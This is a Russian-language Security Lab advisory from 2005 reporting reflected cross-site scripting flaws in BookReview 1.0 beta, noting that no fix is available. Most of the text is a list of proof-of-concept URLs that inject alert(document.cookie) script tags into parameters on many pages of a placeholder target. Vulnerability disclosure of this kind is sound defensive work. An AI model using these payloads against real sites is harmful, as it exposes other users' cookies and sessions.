Security Lab

Межсайтовый скриптинг в BookReview

Дата публикации:27.05.2005
Всего просмотров:1364
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: BookReview 1.0 beta

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость существует в различных сценариях из-за недостаточной обработки входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[target]/add_review.htm?isbn=0801052319&
node=%3Cscript%3Ealert(document.cookie)%3C/
script%3E&review=true

http://[target]/add_review.htm?is bn=0801052319%
22%3E%3Cscript%3Ealert(document.cookie)%3C/
script%3E&node=Political_Science&review=true

http://[target]/add_review.htm?isbn=0553278223&
node="><script>ale rt(document.cookie)</script>&review=true

http://[target]/add_review.htm?node=index&isbn=\\">
< script>alert(document.cookie)</script>

http://[target]/index.php?page=a dd_contents&isbn=
083081423X%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E&chapters=25

http://[target]/index.php?page=add_contents&isbn=
083081423X&chapters=25%22 %3E%3Cscript%3E
alert(document.cookie)%3C/script%3E

http://[target]/add_contents.htm?isbn=083081423X%22
%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[tar get]/suggest_category.htm?node=Agriculture%22
%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/contact.htm?user=admin%22%3E%3Cscript
%3Ealert(document. cookie)%3C/script%3E

http://[target]/add_booklist.htm?node=Agriculture_and_Aquaculture
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/add_url. htm?node=%3Cscript%3Ealert
(document.cookie)%3C/script%3E

http://[target]/search.htm?page=search&submit%5Bstring
%5D=%5C%22%3E%3Cscript%3Ealert%28document.
cookie%29%3C%2 Fscript%3E&submit=Ok&submit%5Btypeu

http://[target]/add_classification.htm?isbn=0830815961
%22%3E%3Cscript%3Ealert(document.cookie)%3C/
script%3E&node=Gospels

http:// [target]/suggest_review.htm?node=
Business_and_Economics"><SCRIPT>alert()</SCRIPT>

Решение: Способов устранения уязвимости не существует в настоящее время.
Ссылки: BookReview 1.0 multiple variable XSS